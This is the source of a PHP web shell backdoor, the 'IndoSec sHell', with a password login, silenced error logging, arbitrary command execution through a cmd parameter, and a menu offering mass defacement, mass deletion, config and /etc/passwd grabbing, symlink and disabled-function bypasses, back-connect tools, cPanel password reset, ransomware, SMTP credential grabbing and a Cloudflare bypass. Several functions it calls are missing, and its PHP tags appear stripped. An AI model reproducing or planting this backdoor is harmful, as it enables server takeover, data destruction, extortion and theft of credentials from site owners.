/*
* Konsep Shell : Brillyan -Founder { IndoSec }-
* Pembuat : Holiq - { IndoSec }

* Re-Code Boleh Asal Dah Izin Sama Pembuat, Ganti Author & Re-Code Tanpa Seizin Pembuat... Fix Lo Noob Anjenk
* Klo Kga Bisa Bikin Cek Chanel IndoSec, Ada Tutornya, Jangan Cuma Bisa Ganti Author Doank Bangsad
* https://www.youtube.com/playlist?list=PLAAbQaUpDeM7nGwS6WfaTm_cPC3RUiswi

* Thanks For All Member { IndoSec }, Yang Telah Membantu Proses Pembuatan Shell,Dan Dari Shell Lain Untuk Inspirasinya

* { IndoSec sHell }
* Contact Me? fb.com/holiq.xid, WhatsApp? Cek Bio Fb
* Nb: shell ini blm sepenuhnya selesai, jadi kalau menemukan error/tampilan tidak bagus/tidak responsive harap dimaklumi. V 0.2
*/
session_start();
error_reporting(0);
@set_time_limit(0);
@clearstatcache();
@ini_set('error_log', null);
@ini_set('log_errors', 0);
@ini_set('max_execution_time', 0);
@ini_set('output_buffering', 0);
@ini_set('display_errors', 0);

/* Configurasi */
$aupas = '54062f3bf6377d42b4fab7c8fedfc7da'; // IndoSec
$default_action = 'FilesMan';
$default_use_ajax = true;
$default_charset = 'UTF-8';
date_default_timezone_set('Asia/Jakarta');
function login_shell() {

<!DOCTYPE html>


<meta name="viewport" content="widht=device-widht, initial-scale=1.0"/>
<meta name="theme-color" content="#343a40"/>
<meta name="author" content="Holiq"/>
<meta name="copyright" content="{ IndoSec }"/>
{ IndoSec sHell } <title>{ IndoSec sHell }</title>
<link rel="icon" type="image/png" href="https://www.holiq.projectku.ga/indosec.png"/>
<link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/bootstrap/4.3.0/css/bootstrap.min.css"/>
<link rel="stylesheet" href="https://use.fontawesome.com/releases/v5.7.1/css/all.css"/>

<body class="bg-dark text-center text-light">
<div class="container text-center mt-3">

{ INDOSEC }


<h5>sHell Backdoor</h5><hr/>
<p class="mt-3 font-weight-bold"><i class="fa fa-terminal"></i> Please Login</p>

<div class="form-group input-group">
<div class="input-group-prepend">
<div class="input-group-text"><i class="fa fa-user"></i></div>
</div>

</div>


</div>
<a href="https://facebook.com/IndoSecOfficial" class="text-muted fixed-bottom mb-3">Copyright 2019 @ { IndoSec }</a>







<meta name="viewport" content="widht=device-widht, initial-scale=1"/>
<meta name="theme-color" content="#343a40"/>
<meta name="author" content="Holiq"/>
<meta name="copyright" content="{ IndoSec }"/>
<link rel="icon" type="image/png" href="https://www.holiq.projectku.ga/indosec.png"/>
{ IndoSec sHell } <title>{ IndoSec sHell }</title>
<link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/bootstrap/4.3.0/css/bootstrap.min.css"/>
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.10.2/css/all.min.css"/>
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css"/>
<script src="https://code.jquery.com/jquery-3.3.1.js"></script>
<script src="https://stackpath.bootstrapcdn.com/bootstrap/4.3.1/js/bootstrap.min.js"></script>
<script src="https://cdn.jsdelivr.net/npm/sweetalert2@8.18.0/dist/sweetalert2.all.min.js"></script>

<body class="bg-dark text-light">
<script>
$(document).ready(function(){
$(window).scroll(function(){
if ($(this).scrollTop() > 700){
$(".scrollToTop").fadeIn();
}else{
$(".scrollToTop").fadeOut();
}
});
$(".scrollToTop").click(function(){
$("html, body").animate({scrollTop : 0},1000);
return false;
});
});
$(document).ready(function(){
$('input[type="file"]').on("change", function(){
let filenames = [];
let files = document.getElementById("customFile").files;
if (files.length > 1){
filenames.push("Total Files (" + files.length + ")");
}else{
for (let i in files){
if (files.hasOwnProperty(i)){
filenames.push(files[i].name);
}
}
}
$(this).next(".custom-file-label").html(filenames.join(","));
});
});
var max_fields = 5;
var x = 1;
$(document).on('click', '#add_input', function(e){
if(x < max_fields){
x++;
$('#output').append('<div class=\"input-group\ form-group\ text-dark\" id=\"out\"><input type=\"text\" class=\"form-control\" name=\"nama_file[]\" placeholder=\"Nama File...\"><div class=\"input-group-prepend\ remove\"><div class=\"input-group-text\"><a href="#" class="text-dark"><i class=\"fa fa-minus\"></i></a></div></div></div>');
}
$('#output').on("click",".remove", function(e){
e.preventDefault(); $(this).parent('#out').remove(); x--;
repeat();
})
});
$(document).on('click', '#add_input1', function(e){
if(x < max_fields){
x++;
$('#output1').append('<div class=\"input-group\ form-group\ text-dark\" id=\"out\"><input type=\"text\" class=\"form-control\" name=\"nama_folder[]\" placeholder=\"Nama Folder...\"><div class=\"input-group-prepend\ remove\"><div class=\"input-group-text\"><a href="#" class="text-dark"><i class=\"fa fa-minus\"></i></a></div></div></div>');
}
$('#output1').on("click",".remove", function(e){
e.preventDefault(); $(this).parent('#out').remove(); x--;
repeat();
})
});

</script>
<style>
@import url(https://fonts.googleapis.com/css?family=Lato);
@import url(https://fonts.googleapis.com/css?family=Quicksand);
@import url(https://fonts.googleapis.com/css?family=Inconsolata);
@media(min-width:767px){.scrollToTop{display:none !important;}}
@media(max-width:767px){textarea{font-size:13px !important;}}
input[type="text"],textarea {font-family: "Inconsolata", monospace;}
body{margin:0;padding:0;font-family:"Lato";overscroll-behavior:none;}
.infor{font-size:14px;color:#333!important;}
.ds{color:#f00!important;word-wrap:break-word;}
#tab table thead th{padding:5px;font-size:16px;white-space: nowrap;}
#tab tr {border-bottom:1px solid #ccc;}
#tab tr:hover{background:#5B6F7D;color:#fff;}
#tab tr td{padding:5px 10px;white-space:nowrap;}
.pinggir{text-align:left !important; padding-left: 4px !important;}
#tab tr td .badge{font-size:13px;}
.active,.active:hover{color:#00FF00;}
a {font-family:"Quicksand"; color:white;}
a:hover{color:dodgerBlue;}
.badge{width:30px;transition:.3s;}
.badge:hover{transform: scale(1.1);transition:.3s;}
.ico {width:25px;}
.ico2{width:30px;}
.scrollToTop{
position:fixed;
bottom:30px;
right:30px;
width:35px;
height:35px;
background:#262626;
color:#fff;
border-radius:15%;
text-align:center;
opacity:.5;
}
.scrollToTop:hover{color:#fff;}
.up{font-size:25px;line-height:35px;}
.lain{color:#888888;font-size:20px;margin-left:5px;top:1px;}
.lain:hover{color:#fff;}
.tambah{
width:35px;
height:35px;
line-height:35px;
border:1px solid;
border-radius:50%;
text-align:center;
}
.fiture{margin:3px;}
.tmp th {font-size:14px;}
.tmp tr td{border:solid 1px #BBBBBB;text-align:center;font-size:13px;padding:2px 5px;}
.tmp tr:hover{background:#5B6F7D; color:#fff;}
.about{color:#000;}
.about .card-body .img{
position: relative;
background: url(https://i.postimg.cc/Wb1X4xNS/image.png);
background-size: cover;
width: 150px;
height: 150px;
}
.butn {
position: relative;
text-align: center;
padding: 3px;
background:rgba(225,225,225,.3);
-webkit-transition: background 300ms ease, color 300ms ease;
transition: background 300ms ease, color 300ms ease;
}
input[type="radio"].toggle {display:none;}
input[type="radio"].toggle + label {cursor:pointer;margin:0 2px;width:60px;}
input[type="radio"].toggle + label:after {
position: absolute;
content: "";
top: 0;
background: #fff;
height: 100%;
width: 100%;
z-index: -1;
-webkit-transition: left 400ms cubic-bezier(0.77, 0, 0.175, 1);
transition: left 400ms cubic-bezier(0.77, 0, 0.175, 1);
}
input[type="radio"].toggle.toggle-left + label:after {left:100%;}
input[type="radio"].toggle.toggle-right + label {margin-left:-5px;}
input[type="radio"].toggle.toggle-right + label:after {left:-100%;}
input[type="radio"].toggle:checked + label {cursor:default;color:#000;-webkit-transition:color 400ms;transition: color 400ms;}
input[type="radio"].toggle:checked + label:after {left:0;}
</style>
<nav class="navbar static-top navbar-dark">
<button class="navbar-toggler"type="button" data-toggle="collapse" data-target="#info" aria-label="Toggle navigation">
<i style="color:#fff;" class="fa fa-navicon"></i>
</button>
<div class="collapse navbar-collapse" id="info">
<ul>
<a href="https://facebook.com/IndoSecOfficial" class="lain"><i class="fa fa-facebook tambah"></i></a>
<a href="https://www.instagram.com/indosec.id" class="lain"><i class="fa fa-instagram tambah"></i></a>
<a href="https://www.youtube.com/IndoSec" class="lain"><i class="fa fa-youtube-play tambah"></i></a>
<a href="https://github.com/indosecid" class="lain"><i class="fa fa-github tambah"></i></a>
<a href="https://indosec.web.id" class="lain"><i class="fa fa-globe tambah"></i></a>
</ul>
</div>
</nav>
<div class="container">
<h1 class="text-center"><a href="https://facebook.com/IndoSecOfficial" style="color:#ffffff;">{ INDOSEC }
<h5>Shell Backdoor</a></h5>

<hr/>
<div class="text-center">
<div class="d-flex justify-content-center flex-wrap">
<a href="?" class="fiture btn btn-danger btn-sm"><i class="fa fa-home"></i> Home</a>
<a href="?dir== $dir &aksi=upload" class="fiture btn btn-danger btn-sm"><i class="fa fa-upload"></i> Upload</a>
<a href="?dir== $dir &aksi=buat_file" class="fiture btn btn-danger btn-sm"><i class="fa fa-plus-circle"></i> Buat File</a>
<a href="?dir== $dir &aksi=buat_folder" class="fiture btn btn-danger btn-sm"><i class="fa fa-plus"></i> Buat Folder</a>
<a href="?dir== $dir &aksi=masdef" class="fiture btn btn-danger btn-sm"><i class="fa fa-exclamation-triangle"></i> Mass Deface</a>
<a href="?dir== $dir &aksi=masdel" class="fiture btn btn-danger btn-sm"><i class="fa fa-trash"></i> Mass Delete</a>
<a href="?dir== $dir &aksi=jumping" class="fiture btn btn-danger btn-sm"><i class="fa fa-exclamation-triangle"></i> Jumping</a>
<a href="?dir== $dir &aksi=config" class="fiture btn btn-danger btn-sm"><i class="fa fa-cogs"></i> Config</a>
<a href="?dir== $dir &aksi=adminer" class="fiture btn btn-danger btn-sm"><i class="fa fa-user"></i> Adminer</a>
<a href="?dir== $dir &aksi=symlink" class="fiture btn btn-danger btn-sm"><i class="fa fa-exclamation-circle"></i> Symlink</a>
<a href="?dir== $dir &aksi=bctools" class="fiture btn btn-danger btn-sm"><i class="fas fa-network-wired"></i> Network</a>
<a href="?dir== $dir &aksi=resetpasscp" class="fiture btn btn-warning btn-sm"><i class="fa fa-key"></i> Auto Reset Cpanel</a>
<a href="?dir== $dir &aksi=auteduser" class="fiture btn btn-warning btn-sm"><i class="fas fa-user-edit"></i> Auto Edit User</a>
<a href="?dir== $dir &aksi=ransom" class="fiture btn btn-warning btn-sm"><i class="fab fa-keycdn"></i> Ransomware</a>
<a href="?dir== $dir &aksi=smtpgrab" class="fiture btn btn-warning btn-sm"><i class="fas fa fa-exclamation-circle"></i> SMTP Grabber</a>
<a href="?dir== $dir &aksi=bypascf" class="fiture btn btn-warning btn-sm"><i class="fas fa-cloud"></i> Bypass Cloud Flare</a>
<a href="?dir== $dir &aksi=zip_menu" class="fiture btn btn-warning btn-sm"><i class="fa fa-file-archive-o"></i> Zip Menu</a>
<a href="?about" class="fiture btn btn-warning btn-sm"><i class="fa fa-info"></i> About Us</a>
<a href="?keluar" class="fiture btn btn-warning btn-sm"><i class="fa fa-sign-out"></i> keluar</a>
</div>
</div>
<div class="row">
<div class="col-md-5"><br/>
<h5><i class="fa fa-terminal"></i>Terminal : </h5>



<hr/>
<h5><i class="fa fa-search"></i> Informasi : </h5>
<div class="card table-responsive">
<div class="card-body">
<table class="table infor">

PHP
: = $ver


IP Server
: = $ip


HDD
<td class="d-flex">Total : =formatSize($total) Free : =formatSize($free) [= $pers %]


Domain
: = $dom


MySQL
: = $mysql


cURL
: = $curl


Mailer
: = $mail


Disable Function
: = $show_ds


Software
: = $sof


Sistem Operasi
: = $os


</div>
</div><hr/>
</div>
<div class="col-md-7 mt-4">

//keluar
if (isset($_GET['keluar'])) {
session_start();
session_destroy();
echo '<script>window.location="?";</script>';
}
//cmd
if (isset($_GET['cmd'])) {
echo "<pre class='text-white'>".exe($_GET['cmd']).'</pre>';
exit;
}
//about
if (isset($_GET['about'])) {
about();
}
//upload
if ($_GET['aksi'] == 'upload') {
aksiUpload($dir);
}
//openfile
if (isset($_GET['file'])) {
$file = $_GET['file'];
}
$nfile = basename($file);
//chmod
if ($_GET['aksi'] == 'chmod_file') {
chmodFile($dir, $file, $nfile);
}
//buat_file
if ($_GET['aksi'] == 'buat_file') {
buatFile($dir, $imgfile);
}
//view
if ($_GET['aksi'] == 'view') {
view($dir, $file, $nfile, $imgfile);
}
//edit
if ($_GET['aksi'] == 'edit') {
editFile($dir, $file, $nfile, $imgfile);
}
//rename
if ($_GET['aksi'] == 'rename') {
renameFile($dir, $file, $nfile, $imgfile);
}
//Delete File
if ($_GET['aksi'] == 'hapusf') {
hapusFile($dir, $file, $nfile);
}
$ndir = $_GET['target'];
//chmod
if ($_GET['aksi'] == 'chmod_dir') {
chmodFolder($dir, $ndir);
}
//Add Folder
if ($_GET['aksi'] == 'buat_folder') {
buatFolder($dir, $imgfol);
}
//Rename Folder
if ($_GET['aksi'] == 'rename_folder') {
renameFolder($dir, $ndir, $imgfol);
}
//Delete Folder
if ($_GET['aksi'] == 'hapus_folder') {
deleteFolder($dir, $ndir);
}

/*
* Fungsi_Tambahan
*
*
* Mass Deface
* IndoXploit
*/
if ($_GET['aksi'] == 'masdef') {
aksiMasdef($dir, $file, $imgfol, $imgfile);
}
/*
* mass delete
* IndoXploit
*/
if ($_GET['aksi'] == 'masdel') {
aksiMasdel($dir, $file, $imgfol, $imgfile);
}
/*
* Jumping
* IndoXploit
*/
if ($_GET['aksi'] == 'jumping') {
aksiJump($dir, $file, $ip);
}
//Config
if ($_GET['aksi'] == 'config') {
aksiConfig($dir, $file);
}
//Bypass etc/passwd
if ($_GET['aksi'] == 'passwbypass') {
aksiBypasswd($dir, $file);
}
//Adminer
if ($_GET['aksi'] == 'adminer') {
aksiAdminer($dir, $file);
}
/*
* Symlink
* Kuda Shell
*/
if ($_GET['aksi'] == 'symlink') {
aksiSym($dir, $file);
}
if ($_GET['aksi'] == 'symread') {
aksiSymread($dir, $file);
}
if ($_GET['aksi'] == 'sym_404') {
sym404($dir, $file);
}
if ($_GET['aksi'] == 'sym_bypas') {
symBypass($dir, $file);
}
/*
* Back Connect
* Kuda Shell
*/
if ($_GET['aksi'] == 'bctools') {
bcTool($dir, $file);
}
/*
* Bypass Disable Function
* Kuda Shell
*/
if ($_GET['aksi'] == 'disabfunc') {
disabFunc($dir, $file);
}
/*
* Auto Reset Cpanel
* IndoSec -Fauzan-
*/
if ($_GET['aksi'] == 'resetpasscp') {
resetCp($dir);
}
/*
* Auto Edit User
* IndoXploit
*/
if ($_GET['aksi'] == 'auteduser') {
autoEdit($dir, $file);
}
/*
* Ransomware
* IndoSec
*/
if ($_GET['aksi'] == 'ransom') {
ransom($dir, $file);
}
/*
* SMTP Grabber
* IndoXploit
*/
if ($_GET['aksi'] == 'smtpgrab') {
scj($dir);
}
//Bypass Cloud Flare
if ($_GET['aksi'] == 'bypascf') {
bypasscf();
}
/*
* Zip Menu
* IndoSec -Rizsyard-
*/
if ($_GET['aksi'] == 'zip_menu') {
zipMenu($dir, $file);
}

$dirs = explode('/', $dir);
echo 'Path : ';
foreach ($dirs as $id=>$pat) {
if ($pat == '' && $id == 0) {
$a = true;
echo '<a href="?dir=/">/</a>';
continue;
}
if ($pat == '') {
continue;
}
echo '<a style="word-wrap:break-word;" href="?dir=';
for ($i = 0; $i <= $id; $i++) {
echo "$dirs[$i]";
if ($i != $id) {
echo '/';
}
}
echo '">'.$pat.'</a>/';
}
$scandir = scandir($dir);
echo '&nbsp;&nbsp;[ '.w($dir, perms($dir)).' ]';

<div id="tab"><table class="text-white mt-1 table-hover table-responsive">
<thead class="bg-info text-center">
<th class="text-left">File/folder</th>
<th>Size</th>
<th>Last Modified</th>
<th>Permission</th>
<th>Action</th>
</thead>

if (count($scandir) == 2) {
echo "<td class='text-center' colspan='5'>Direktori kosong";
}
foreach ($scandir as $dirb) {
$dtime = date('d/m/y G:i', filemtime("$dirb/$dirx"));
/* cek jika ini berbentuk folder */
/* cek jika nama folder karaker terlalu panjang */
if (strlen($dirb) > 18) {
$_dir = substr($dirb, 0, 18).'...';
} else {
$_dir = $dirb;
}
if (!is_dir($dir.'/'.$dirb) || $dirb == '.' || $dirb == '..') {
continue;
}
<tr class="text-center">
<td class="pinggir">= $imgfol <a href="?dir== $dir /= $dirb ">= $_dir </a>
--
= $dtime

<a href="?dir== $dir &target== $dirb &aksi=chmod_dir">

if (is_writable($dir.'/'.$dirb)) {
$color = '#00ff00';
} elseif (!is_readable($dir.'/'.$dirb)) {
$color = 'red';
}
echo "<font color='$color'>".perms($dir.'/'.$dirb).'</font>';
</a>


<a title="Rename" class="badge badge-success" href="?dir== $dir &target== $dirb &aksi=rename_folder">&nbsp;<i class="fas fa-pen"></i>&nbsp;</a>&nbsp;&nbsp;<a title="Delete" class="badge badge-danger" href="?dir== $dir &target== $dirb &aksi=hapus_folder">&nbsp;<i class="fa fa-trash"></i>&nbsp;</a>



}

foreach ($scandir as $file) {
$ftime = date('d/m/y G:i', filemtime("$dir/$file"));
/* cek jika ini berbentuk file */
if (!is_file($dir.'/'.$file)) {
continue;
}
/* cek jika karaker terlalu panjang */
if (strlen($file) > 25) {
$_file = substr($file, 0, 25).'...-.'.$ext;
} else {
$_file = $file;
}
/* set image berdasarkan extensi file */
$ext = strtolower(pathinfo($file, PATHINFO_EXTENSION));
<tr class="text-center">
<td class="pinggir">
<img src="= iconFile($ext) "class="ico2"></img>
<a href="?dir== $dir &aksi=view&file== $dir /= $file ">= $_file </a>

= formatSize(filesize($file))
= $ftime

<a href="?dir== $dir &aksi=chmod_file&file== $dir /= $file " class="text-center">

if (is_writable($dir.'/'.$file)) {
$color = '#00ff00';
} elseif (!is_readable($dir.'/'.$file)) {
$color = 'red';
}
echo "<font color='$color'>".perms($dir.'/'.$file).'</font>';
</a>

<td class="d-flex">
<a title="Lihat" class="badge badge-info" href="?dir== $dir &aksi=view&file== $dir /= $file ">&nbsp;<i class="fa fa-eye"></i>&nbsp;</a>&nbsp;&nbsp;
<a title="Edit" class="badge badge-success" href="?dir== $dir &aksi=edit&file== $dir /= $file ">&nbsp;<i class="far fa-edit"></i>&nbsp;</a>&nbsp;&nbsp;
<a title="Rename" class="badge badge-success" href="?dir== $dir &aksi=rename&file== $dir /= $file ">&nbsp;<i class="fa fa-pencil"></i>&nbsp;</a>&nbsp;&nbsp;
<a title="Delete" class="badge badge-danger" href="?dir== $dir &aksi=hapusf&file== $dir /= $file " title="Delete">&nbsp;<i class="fa fa-trash"></i>&nbsp;</a>&nbsp;&nbsp;
<a title="Download" class="badge badge-primary" href="?&dir== $dir &aksi=download&file== $dir /= $file " title="Download">&nbsp;<i class="fa fa-download"></i>&nbsp;</a>



}

</div><hr/>
<a class="text-muted" href="https://facebook.com/IndoSecOfficial">Copyright 2019 { IndoSec }</a>
<br/>
<a href='#' class='scrollToTop'><i class='fa fa-arrow-up up' aria-hidden='true'></i></a>
</div>
</div>